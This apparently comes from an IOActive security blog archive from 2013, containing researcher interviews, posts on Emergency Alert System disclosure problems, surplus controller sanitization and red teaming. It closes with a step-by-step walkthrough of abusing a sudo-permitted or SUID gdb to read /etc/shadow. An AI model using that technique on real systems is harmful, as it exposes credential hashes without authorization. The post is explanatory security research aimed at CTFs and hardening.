INSIGHTS | October 22, 2013

NCSAM – Lucas Apa explains the effects of game cheating, 3D modeling, and psychedelic trance music on IT security

I got involved with computers in 1994, when I was six years old. I played games for some years without ever thinking about working in the security field. My first contact with security came when I started to create “trainers” to cheat at games by manipulating their memory. This led me to many tutorials on assembly and cracking in 2001, which is when my security research began.

The line of legality was blurry back then; many of these activities were not yet considered illegal, which allowed an explosion of hacking groups, material, and magazines. Many of the hacking techniques that still prevail today date from the early 2000s. At the time I lacked good programming skills and an Internet connection in my homeland, Argentina. I got interested in packers and solved many crackmes because I wondered how commercial games built their anti-cracking protections; pirated games were heavily distributed in my country. Having some experience with debuggers allowed me to quickly learn the foundations of programming languages. Many years of self-education and a soon-to-be-finished computer engineering degree finally gave me sufficient insight to comprehend how modern software works.

When I was a teenager, I also had the opportunity to explore other areas related to computers, such as 3D modeling (animated short films) and producing psychedelic trance music. All of these artistic and creative pursuits help me appraise and seize opportunities, especially when working out how a new exploitation technique operates or devising an innovative solution or approach to a problem.

There was a moment when I realized the serious effort and true thirst I would need to achieve what might seem impossible to other people. The security industry is highly competitive, and it sometimes requires extreme skill to provide a comprehensive response or a novel methodology for doing things. The battle between offensive and defensive security has always been entertaining, pushing the boundaries of imagination and creativity every time. This awakens true passion in the people who like being part of this game. Every position is important, and the most interesting part is that both sides are convinced that their decisions are right and accurate.

I like to research everything that could be used to play better offense in real-world scenarios. Learning about technologies and discovering how to break them is something I do for a living. Defensive security has become stronger in some areas and requires more sophisticated techniques to defeat reliably and precisely. Hacking skills in general are now harder to master because of the vast amount of information available out there. Great research demands conceptual vision and a willingness to disregard past experience suggesting that something is not achievable. My technical interests involve discovering vulnerabilities, writing exploits, and playing offense in CTFs; something close to being in the quicksand but behind defensive lines. This is one of my favourite feelings, and why I choose to work in security every day.

My first piece of advice to anyone who would like to become a pen tester or researcher is to always maintain patience, dedication, and effort. This is a very satisfying career, but it requires a deep and constant learning phase. Having a degree in Computer Science/Engineering will help you get a general overview of how the technology world works, but much of the knowledge and many of the abilities can only be learned and mastered with intensive personal training. Technology changes every year, and future systems could be much different from today’s. The key is to not focus too narrowly on one thing without tasting other fields inside the security world. Fortunately, they can be combined, since in this career all the subjects share the same goal. Learn to appreciate other people’s investigative work, blog posts, and publications; every detail is sometimes the result of weeks or months of work. Information is available to almost everyone; you just need to dive in and start your journey with the topics you like most.

INSIGHTS | October 21, 2013

NCSAM – Eireann Leverett on why magic is crucial

Late last week I had the pleasure of interviewing IOActive Labs CTO Cesar Cerrudo on how he got into IT security. Today I am fortunate enough to have the pleasure of interviewing Eireann Leverett, a senior researcher for IOActive, on the same subject and on how magic played a part.

IOActive: How did you get into security?
 
Eireann: Actually, I was very slow to get security as an official job title; that only really happened in the last few years. However, I always knew that’s how my mind was bent.
For example, everything I know about software security I learned from card tricks at 14. I know it seems ridiculous, but it’s true. Predicting session IDs from bad PRNGs is just like shuffle-tracking and card counting. Losing a card in the deck and finding it again is like controlling a pointer. If you understand the difference between a riffle shuffle and an overhand shuffle, you understand list manipulation.
Privilege escalation is not unlike using peeks and forces in mentalism to corrupt assumptions about state. Cards led me to light maths and light crypto and zero-knowledge proofs.
From there I studied formally in Artificial Intelligence and Software Engineering in Edinburgh. The latter took me into 5+ years of Quality Assurance and Automated Testing, which I still believe is a very important breeding ground for security professionals.
After that I did my Master’s at Cambridge and accepted a great offer from IOActive mixing research and penetration testing. Enough practicality so I’m not irrelevant to real world application, and enough theory & time to look out to the horizon.
IOActive: What do you find most exciting about security?
 
Eireann: The diversity of subjects. I will never know it all, and I love that it continually evolves. It is exciting to pit yourself against the designs of others, and work against malicious and deceptive people.
There are not many jobs in life where you get to pretend to be a bad guy. Deceptionists are not usually well regarded by society. However, in this industry, having that mindset is very much rewarded.
There’s a quote from Houdini I once shared with our President and Founder, and we smile about it often. The quote is:
“Magic is the right way to do wrong.”
That’s what being an IOActive pirate is: the right way to do wrong. We make invisible badness visible and explain it to those who need to understand it in terms of business and process rather than the details of the technology.
IOActive: What do you like to research, and why?
 
Eireann: Anything with a physical consequence. I don’t want to work in banking, protecting other people’s money. My blood gets flowing when there are valves to open, current flowing, or bay doors to shut. In this sense, I’m kind of a redneck engineer.
There’s a more academic side to me and my research passions as well, though. I like incident response and global co-operation. I took to heart something Team Cymru & Dragon Research said:
Security is more about protecting your neighbours.
If you don’t understand that your company can be compromised by the poor security of your support connections, you’ve missed the point. That’s why we have dynamic information sharing and great projects like OpenIOC, BGPranking, honeynets, and organisations like FIRST. It doesn’t do you any good to secure only yourself. We must share to win, as a global society.
IOActive: What advice would you give to someone who would like to become a pentester/researcher?
 
Eireann: Curiosity and autodidacticism are the only way.
The root of hacking is understanding. To hack is to understand something better than it understands itself, and then nudge it to alter its outputs. You won’t understand anything merely by listening to other people tell you about it. So go do things, either on your own or in formal education. Ultimately it doesn’t matter which, as long as you learn and understand, and can articulate what you learned to others.
INSIGHTS | October 18, 2013

NCSAM – an Interview with Cesar Cerrudo

Today we continue our support for National Cyber Security Awareness Month by interviewing Cesar Cerrudo, Chief Technology Officer for IOActive Labs. Cesar provides us with some insight into how he got into IT security and why it’s important to be persistent!

IOActive: How did you get into security?
 
Cesar: I think my first hacks were when I was 10 years old or so. I modified BASIC code in CZ Spectrum games and also cheated at games by loading different parts of the code from a cassette (yes, not floppy disks at that time; loading a game from cassette took around 5-10 minutes, and if something went wrong you had to try again. I don’t miss that at all). After that, though, I was mostly away from computers until I was 19 years old and went to college.
I was always interested in learning to hack but didn’t have enough resources or access to a PC. So while I was at college I started to read books, articles, etc. – anything I could get my hands on. I used to play with (and sometimes break) a friend’s PC (hi Flaco!) once in a while when I had the opportunity. I remember learning Assembly language just from reading books and looking at virus code printed on paper. Finding that virus code and learning from it was amazing (not having a PC wasn’t a problem; a PC is just a tool).
Later on, with some Internet access (an hour or so a week) and access to a PC, things became easier, since lots of information was available; I started to try the things I had read about and to build my own tools.
When you’re learning and reading, one topic takes you to another topic and so on, but I focused on things that I was more familiar with – like web apps, database servers, Microsoft Windows, etc.
Luckily, in Argentina it wasn’t illegal to hack at that time, so I could try things on real-life, production systems. A long time ago, I remember walking into the office of the CEO of my local ISP, handing him hundreds of thousands of usernames, passwords, and credit card records, and telling him that their servers were hackable and that I had hacked them. I know this sounds crazy, but I was young, and in the end they thanked me, and I helped them identify and fix the vulnerabilities. I asked for a job, but no luck; I don’t know why.
I also did other crazy hacks when I was young, but it’s better not to talk about that; nothing criminal, though. I used to report the vulnerabilities, but most admins didn’t like it. I recommend not engaging in anything illegal, as nowadays you can easily end up in jail if you try to hack a system. Today it is simpler to build a lab and play safely at home.
Luckily those crazy times ended, and soon I started to find vulnerabilities in well-known and widely used software such as SQL Server, Oracle, and Windows. I was then also able to create some new attack and exploitation techniques.
IOActive: What do you find most exciting about security?
 
Cesar: Learning new things, taking on challenges, solving difficult problems. You get to deeply study how certain technologies work and to identify security problems in software and hardware used massively worldwide – problems that can have a big impact on everyone’s lives, since everything has become digital nowadays.
IOActive: What do you like to research, and why?
 
Cesar: This is related to my previous answers, but I like challenges, learning, and hacking stuff.
IOActive: What advice would you give to someone who would like to become a pentester/researcher?
 
Cesar: My advice would be: if you are interested in hacking or simply like it, nothing can stop you. Everything you need to learn is out there. You just need to try hard and put in a lot of effort without ever giving up. Nothing is impossible; it’s just a matter of effort and persistence.
INSIGHTS | October 17, 2013

Strike Two for the Emergency Alerting System and Vendor Openness

Back in July I posted a rant about my experiences reporting the DASDEC issues and the problems I had getting things fixed. Some months have passed and I thought it would be a good time to take a look at how the vulnerable systems have progressed since then.
Well, back then my biggest complaint was the lack of forthrightness in Monroe Electronics’ public reporting of the issues; they were treated as a marketing problem rather than a security one. The end result (at the time) was that there were more vulnerable systems available on the internet – not fewer – even though many of the deployed appliances had adopted the 2.0-2 patch.
What I didn’t know at the time was that the 2.0-2 patch wasn’t as effective as one would have hoped; in most cases bad and predictable credentials were left in place intentionally – as in, I was informed that Monroe Electronics was “intentionally not removing the exposed key(s) out of concern for breaking things.”
In addition to not removing the exposed keys, it didn’t appear that anyone had even tried to review or audit any other aspect of the DASDEC’s security before pushing the update out. If someone told you that you had a shared SSH key for root, you might say… check that the root password isn’t the same for every box too, right? Yeah… you’d think so, wouldn’t you!
After discovering that most of the “patched” servers running 2.0-2 were still vulnerable to the exposed SSH key, I decided to dig deeper into the newly issued security patch and discovered another series of flaws exposing more credentials (allowing unauthenticated alerts), along with a mixed bag of predictable and hardcoded keys and passwords. Oh, and there are web-accessible backups containing credentials.
Even new features introduced to the 2.0-2 version since I first looked at the technology appeared to contain a new batch of credentials hardcoded in their configuration.
Upon our last contact with CERT we were informed that ‘[t]hese findings are entering the realms of “not terribly serious” and “not something the vendor can practically do much about.”‘
Go team cyber-security!
So… on one hand we’ve had one zombie alert and a good handful of responsibly disclosed issues which began back in January 2013… on the other hand, I’m not sure anything has changed except for a few default passwords and some version numbers.
Let’s not forget that the EAS is a critical national infrastructure component designed to save lives in an emergency. Ten months on and the entire system appears more vulnerable than when we began pointing out the vulnerabilities.
INSIGHTS | October 16, 2013

A trip down cyber memory lane, or from C64 to #FF0000 teaming

So, it’s National Cyber Security Awareness Month, and here at IOActive we have been lining up some great content for you. Before we get to that, I was asked to put up a short post with some background on how I got into infosec, and what has been keeping me here for almost 20 years now.

Brace yourselves for a trip down memory lane, then :-). For me, getting into security didn’t start with a particular event or decision. I’ve always been intrigued by how things worked, and I used to take things apart and sometimes also put them back together: Meccano, Lego, assorted electrical contraptions, radios, etc. Things got a bit more serious when I was about 6 or 7, when I somehow managed to convince my parents to get me one of those newfangled computers. It was a Commodore 64 (we were late adopters at the Amit residence), but the upside was that I had a real floppy drive rather than a tape cassette 😉
That was my introduction to programming (and hacking). After going through all the literature I could get my hands on in Hebrew, I switched over to English material (learning the language as I went along) and did a lot of basic programming (yes, BASIC programming). That’s also when I started to deal with basic software protection mechanisms.
Things got more real later on in my PC days when, getting back to programming after a long hiatus, I picked up this small project called Linux and tried to get it working on my PC. Later I realized that familiarity with kernel module development and debugging was worth something in the real world, in the form of security.
Ever since then, I have found myself on a constant learning curve, always running into new technologies and new areas of interest tangent to information security. It’s what has been keeping my ADD satisfied as I ventured into risk, international law, finance, economic research, psychology, hardware, physical security, and other areas that I’m probably forgetting in the edits to this post (have I mentioned ADD?).
I find it hard to define “what I like to research”, as my range of interests keeps expanding and venturing into different areas. Once it was a deep dive into Voice over IP and how it can be abused to exfiltrate data; another time it was exploring the business side of cyber-crime and how things work there from an “economy” perspective; at other times it was purely defense-based, when I switched seats and worked with a large customer who needed to up their defenses properly. It even got weird at one point, when I was dealing with the international legal implications of conflict in the 5th domain while working with NATO on some new advisories and guidance (law is FUN, and don’t let anyone tell you otherwise!).
I guess that for me it’s the mixture of technical and non-technical elements and how these apply in the real world… It kind of goes back to my alma mater (The Interdisciplinary Center), where I had a chance to hone some of these research skills.
As for advice on how to become a pentester / researcher / practitioner of information security? Well, that’s a tough one. I’d say that you need the basics, which for me has always meant an academic degree. Any kind of degree. I know a lot of people feel they are not “learning” anything new at university because they have already mastered Ruby, Python, C++, or whatever. That’s not the point. For me, academia provided tools rather than actual material (yes, I also breezed through the programming portions of college). But that wouldn’t be enough. You need something more than just skills to stay in the industry: a keen eye for detail, an inquisitive mind (at times I’d call it cunning) to explore things that are out of bounds. And sometimes a bit of moxie (chutzpah, as it’s called in Hebrew) to try things that you aren’t completely allowed to. But safely, of course 😉
Hope this makes sense, and maybe sheds some light on what got me here, and what keeps driving me ahead. Have a safe and enjoyable “Cyber” month! 🙂
INSIGHTS | September 10, 2013

Vulnerability bureaucracy: Unchanged after 12 years

One of my tasks at IOActive Labs is to deal with vulnerabilities: reporting them, trying to get them fixed, publishing advisories, and so on. This isn’t new to me. I started reporting vulnerabilities some 12 years ago, and over that time I have reported hundreds of them – many found by me, and many by other people too.

Since the early 2000s I have encountered several problems when reporting vulnerabilities:
  • Vendor not responding
  • Vendor responding aggressively
  • Vendor responding but choosing not to fix the vulnerability
  • Vendor releasing flawed patches, or not patching some vulnerabilities at all
  • Vendor failing to meet deadlines they themselves agreed to

It’s really sad to say that, as of right now, 12 years later, I continue to see most (if not all) of the same problems. Not only that, but some of the organizations that are supposed to help coordinate vulnerability reporting and disclosure (CERTs) are starting to fail, being non-responsive and not contributing much to the effort.
This wouldn’t be a big problem if we were reporting low-impact or unimportant vulnerabilities, but most of the time the team here at IOActive reports critical vulnerabilities affecting systems ranging from critical infrastructure to the most popular commercial applications, operating systems, etc. used by millions of people around the world. There is a big responsibility upon us to work with the affected vendors to get the vulnerabilities fixed, always mindful of how bad things could be if they were exploited.
It’s also surprising to sometimes see tardy responses from teams that are supposed to act and respond fast, such as the Android security team, given that Google has some strong vulnerability policies (12).
It would be nice if most vendors, CERTs, etc. were aware of the following:
  • Independent researchers and security consulting companies report vulnerabilities on a voluntary basis.
  • Independent researchers and security consulting companies have no obligation to report security vulnerabilities.
  • Independent researchers and security consulting companies often invest a lot of time, effort and resources finding vulnerabilities and trying to get them fixed.
  • Vendors and CERTs should be more appreciative of the people reporting vulnerabilities and, at the very least, be more responsive than they typically are today.
  • Vendors and CERTs should adhere to and comply with their own defined deadlines.
I would like vendors and CERTs to start improving a little and becoming more responsive; the attack surface grows every day, and vulnerabilities affect our lives more and more. The more we depend on technology, the more the vulnerabilities will impact us.
There shouldn’t be vulnerability bureaucracy.
If there’s one thing that vendors and CERTs could do to improve the situation, it would be to step up and be accountable for the vulnerability information entrusted to them.
I hope that in the following 12 years something will change for the better.
INSIGHTS | July 11, 2013

Why Vendor Openness Still Matters

When the zombies began rising from their graves in Montana, it had already been over 30 days since IOActive had reported issues with Monroe Electronics’ DASDEC devices.
 
And while it turned out in the end that the actual attacks which caused the false EAS messages to be transmitted relied on the default password never having been changed, this would have been the ideal point to publicize that there was a known issue and that a firmware update was available, or soon would be, to address this and other problems… maybe with a mitigation or two in the meantime, right?

At a minimum it would have been an ideal time to provide the simple mitigation:
“rm ~/.ssh/authorized_keys”
 
Unfortunately this never happened, leading to a phenomenon I like to call “admin droop”. This is where an administrator, after discovering the details of a published vulnerability, determines that he’s not vulnerable because he doesn’t run the default configuration, sees that everything is working, and doesn’t bother to upgrade to the next version.
 
… it happens…
 
In the absence of reliable information, other outlets such as the FCC provided pretty minimal advice about changing passwords and using firewalls; I simply commented to the media that this advice was “inadequate”.
 
Eventually, somewhere around April 24, Monroe, with the assistance of CERT, began contacting customers about a firmware fix; we provided a Shodan XML file with a few hundred vulnerable hosts to help track them down. Finally it looked like things were getting fixed, but I was somewhat upset that I still had not seen official acknowledgement of the issue from Monroe. Then, on June 13, Monroe finally published this security advisory: https://ioactive.com/wp-content/uploads/2013/07/130604-Monroe-Security-PR.pdf. It mentions “Removal of default SSH keys and a simplified user option to load new SSH keys”. OK, it’s not much of an “announcement”, but it’s something. And I know it says April 24, but both the filename and the metadata (pdfinfo) point to, cough, later origins…
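
If you want to check a PDF’s embedded dates yourself, pdfinfo (part of the poppler-utils package) prints them; a quick sketch, with the actual values left for you to discover:

    $ pdfinfo 130604-Monroe-Security-PR.pdf | grep -i date
    CreationDate:   [rather later than April 24]
    ModDate:        [later still]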
 
Inside the advisory is this wonderful sentence: 
“The company notes that most of its users already have obtained this update.”… That sounds like something worth testing!
 
Then it happened, before I could say “admin droop”… 
 
Found/vulnerable hosts before we reported the issue: 222
Found hosts after the patch was released, per a survey on July 11: 412
 
Version numbers      Hosts found    Vulnerable (SSH key)
1.8-5a                         1    Yes
1.8-6                          2    Yes
2.0-0                        110    Yes
2.0-0_a01                      1    Yes
2.0-1                         68    Yes
2.0-2 (patched)               50    No
unreachable                  180    –

While most users may have “obtained” the update, someone certainly didn’t bother applying it…
 
Yep… it’s worse now than it was before we reported the issue in January, and everyone thinks everything is just fine. Granted, I’m sure some of this would still be a problem even if a proper security notice had been issued.
 
I can’t say it any better than these awesome folks over at Google (http://googleonlinesecurity.blogspot.com/2013/05/disclosure-timeline-for-vulnerabilities.html): “Our standing recommendation is that companies should fix critical vulnerabilities within 60 days — or, if a fix is not possible, they should notify the public about the risk and offer workarounds.”

 

INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers: PLCs, RTUs, and the other “field devices.” These devices are the interface between the integrator (e.g., HMI systems, historians, and databases) and the process (e.g., sensors and actuators). Researching this equipment can be costly because PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives looking as if it was literally ripped from a factory floor or even a substation. Each controller typically contains a wealth of information about its origin, and I can often learn a lot about a company from a piece of used equipment. Even decades-old control equipment has a lot of memory and keeps a long record of the previous owner’s process. It is possible to learn the “secret recipe” with just a few hours of work reverse engineering a controller to collect company names, control system network layout, and production history. Even engineers’ names and contact information are likely to be stored in a controller’s log file. For a bad guy, this data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks on the corporate network.
When I find this kind of information, I reach out to the equipment’s original owner. I help them wipe the equipment, and I point them to where the rest of their equipment is being sold, in an attempt to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work. Recently, Billy Rios and Terry McCorkle revealed surplus equipment that they had purchased from a hospital; it held much the same information about its origin.

These situations can be prevented by sanitizing the equipment before it’s released for disposal. Many equipment manufacturers should be able to provide instructions for this process. One option may be to send the controller back to the manufacturer to be sanitized and refurbished.
Another layer of protection against information disclosure is a robust and well-practiced Incident Response plan. Most places that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may be considered a violation. Set up an Incident Response program now and make sure that your process control engineers know to send equipment disposal issues through the IR group.

 

A great deal can be accomplished to keep a control system secure. With a little planning, proper equipment disposal is one of the cheapest things that can be done to keep proprietary process information safe.
INSIGHTS | June 14, 2013

Red Team Testing: Debunking Myths and Setting Expectations

The term “cyber” seems to be overused in every corner of the information security industry. Now there is a new buzz phrase in computer security, “red team engagements.” Supposedly (to get “cyber” on you), you can have a red team test, and it will help move your organization in the correct “cyber direction.”
But what is red team testing really? And what is it not? In this post I’ll try to make some sense of this potent term.
The red team concept has been around for ages. It started as a military term for a team dedicated to simulating all of an enemy’s activities, including everything from methodology to doctrine, strategy, techniques, equipment, and behaviors. The red team was tasked with mastering how the adversary thinks and operates, and then executing the enemy’s strategies and tactics in the field. This allows your own forces to experience what it would be like to combat this enemy in real life − without the risk of getting injured or killed.
Fast forward 10-12 years, and red teams are being used in civilian industry as well as in the military. In private industry, red teams simulate adversaries (not necessarily foreign armies) that could impact the organization. The adversary could be criminals vying for your money, competitors trying to get their hands on your latest designs, or random attackers who want to exploit, destroy, or simply harm your organization. Their motivations can range from social activism to political strategy to financial gain, and so on.

When IOActive is asked to conduct a red team test, our main goal is to accurately and realistically simulate these types of adversaries. So the first, and probably most important, element of a red team test is to define the threat model:

  • Who is your adversary?
  • What are their motivations?
  • Which adversaries are you most afraid of? (This is usually any party that wants to put you out of business.)
Defining the threat model is crucial to the success of a red team engagement, because it determines the value your organization will get from the project.
After we articulate the threat model, the fun part of the engagement begins.
Fun? Yes, because in the real world most tests, such as penetration tests, do not really depict a persistent adversary. Instead, engagements such as pen tests simulate specific strategies that a persistent adversary might use as part of an overall attack.
The red team engagement, on the other hand, includes all possible elements that an adversary might use in such an attack (which is why it is often referred to as “no scope” or “full scope” testing).
In this context, everything is in play: your employees, your infrastructure, the physical office locations, your supply chain (that’s every third party you use as part of your ongoing operations), and more. When developing attack scenarios for red team engagements, every element has to fit together perfectly.

Think of it as an “Ocean’s Eleven” type of attack that can include:

  • Social engineering
  • Electronic and digital attacks
  • Bypassing physical controls
  • Equipment tampering
  • Getting into the supply chain to access your assets
  • And more

This is full scope testing. Unlike in other types of engagement, all or almost all assets are “in scope”.

(Note: Red team engagements do commonly use “reverse scoping” techniques to identify assets that are critical to operations and the types of tampering, access, or removal that are off limits for those assets. These sensitive assets are still in scope, but reverse scoping defines and restricts actions that might substantially disrupt operations.)
So far this sounds like a fun game. But hold on, it isn’t just about the attack. What I like the most is seeing how an organization’s ongoing security operations handle red team attacks.
In a red team test, very few people in the organization know about the test, and even fewer actually know when the test will happen. This means that from an operational security view, all red team activities are treated as if they involve a real adversary.

We gain a lot of insights from the actions and reactions of the organization’s security team to a red team attack. These are the types of insights that matter the most to us:

  • Observing how your monitoring capabilities function during the intelligence gathering phase. The results can be eye opening and provide tremendous value when assessing your security posture.
  • Measuring how your first (and second) responders in information security, HR, and physical security work together. Teamwork and coordination among teams are crucial, and the assessment allows you to build processes that actually work.
  • Understanding what happens when an attacker gains access to your assets and starts to exfiltrate information or actually steals equipment. The red team experience can do wonders for your disaster recovery processes.
These are some of the rewards and benefits of a red team test. As you can see, they go well above and beyond what you would get from other types of focused tests.
I hope this explanation eliminates some of the confusion about red team testing that I have seen lately in Internet discussions. I am not saying that there is no value in pen tests, social engineering engagements, physical assessments, or anti-phishing campaigns. However, to see how all of these different types of security considerations play out in the real world, they also need to be considered as part of a larger (and relevant) context so that you can see how well your organization is prepared for any type of attack.
Last but not least, if you’d like to get hands-on training in how red team engagements are conducted, consider attending our two-day Red Team Training (https://www.blackhat.com/us-13/training/red-team-training.html) at Black Hat 2013 in Las Vegas.
Chris Nickerson and I will cover everything discussed in this post, with particular focus on the elements that go beyond penetration testing. Our topics will include lock picking, social engineering, physical assessments, and, most importantly, how to combine all of these elements into a realistic and successful simulation of an adversary. We also plan to give each of our students a very interesting goodie bag.
Hint: You’ll have fun walking through airport security with that bag :-).
INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file – ten lines is the default.)
Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 
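
You can confirm this yourself on any binary built with debug info (such as the one produced in step 1 below). A quick sketch using readelf from GNU binutils (output trimmed; the exact table layout varies by binutils version):

    $ readelf --debug-dump=line ./foo | grep 'foo\.c'
      1     0     0     0     foo.c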
The following is a simple trick that lets you use GDB as a trampoline to read a file you don’t otherwise have permission to read. The trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.
Here are the steps:
 

1. Compile ‘foo.c’ with the GNU Compiler (GCC) using the -ggdb flag.
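
A minimal sketch (the contents of foo.c don’t matter; any program compiled with debug information will do):

    $ cat foo.c
    #include <stdio.h>

    int main(void)
    {
        printf("hello\n");
        return 0;
    }
    $ gcc -ggdb foo.c -o foo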

2. Open the resulting ELF executable with GDB and use the list command to read its source code:
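
Roughly what you’d see (abridged; prompts and messages vary by GDB version):

    $ gdb -q ./foo
    Reading symbols from ./foo...
    (gdb) list
    1       #include <stdio.h>
    2
    3       int main(void)
    4       {
    5           printf("hello\n");
    6           return 0;
    7       }
    (gdb) quit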


3. Make a copy of ‘foo.c’ named ‘_etc_shadow.c’ and recompile, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable:
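
Something like this sketch (strings may print the name more than once, since it appears in several debug structures):

    $ cp foo.c _etc_shadow.c
    $ gcc -ggdb _etc_shadow.c -o _etc_shadow
    $ strings -a _etc_shadow | grep _etc_shadow.c
    _etc_shadow.c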


4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.
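
If you’d rather script the hex-editor step, a sketch like the following would work; the offsets shown are hypothetical (find your own with grep), and the three NUL bytes of padding make the 14-byte write cover the old 13-character string plus its terminator exactly:

    $ grep -boa _etc_shadow.c _etc_shadow      # -b prints the byte offset of each match
    4135:_etc_shadow.c
    4892:_etc_shadow.c
    $ printf '/etc/shadow\0\0\0' | dd of=_etc_shadow bs=1 seek=4135 conv=notrunc
    $ printf '/etc/shadow\0\0\0' | dd of=_etc_shadow bs=1 seek=4892 conv=notrunc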


5. Evidently, this won’t work unless you have sufficient privileges; otherwise GDB won’t be able to read /etc/shadow.


6. If you trace the open() syscalls executed by GDB:

    $ strace -e open gdb ./_etc_shadow
you can see that it returns -1 (EACCES) because of insufficient permissions.
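
The relevant line of output looks something like this (illustrative; the exact flags and wording vary by libc and strace version):

    open("/etc/shadow", O_RDONLY) = -1 EACCES (Permission denied)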

7. Now imagine that, for some reason, GDB is a privileged command (the SUID (Set User ID) bit in its permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’, because the gdb command would be executed with root privileges.
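
A sketch of that hypothetical scenario; the chmod line is the deliberate misconfiguration being imagined, and the output is illustrative, so please don’t try this on a real system:

    # chmod u+s /usr/bin/gdb      # hypothetical: gdb made SUID root
    $ gdb -q ./_etc_shadow
    (gdb) list
    1       root:$6$Xg1...:15775:0:99999:7:::
    2       daemon:*:15775:0:99999:7:::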


8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow only certain commands to be executed. (To be honest, I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve.)
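
For example, a sudoers entry like this hypothetical one (user ‘alice’ is made up) would authorize gdb, and only gdb, to run as root:

    # /etc/sudoers (hypothetical entry; edit with visudo)
    alice   ALL=(root) NOPASSWD: /usr/bin/gdb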


9. You cannot display the contents of ‘/etc/shadow’ by using the cat command, because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the “source file” (/etc/shadow), as in the sketch below:
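
Putting it all together, the session might look like this (again illustrative; ‘alice’ and the hostname are hypothetical):

    $ sudo cat /etc/shadow
    Sorry, user alice is not allowed to execute '/bin/cat /etc/shadow' as root on devbox.
    $ sudo gdb -q ./_etc_shadow
    (gdb) list
    1       root:$6$Xg1...:15775:0:99999:7:::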


Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.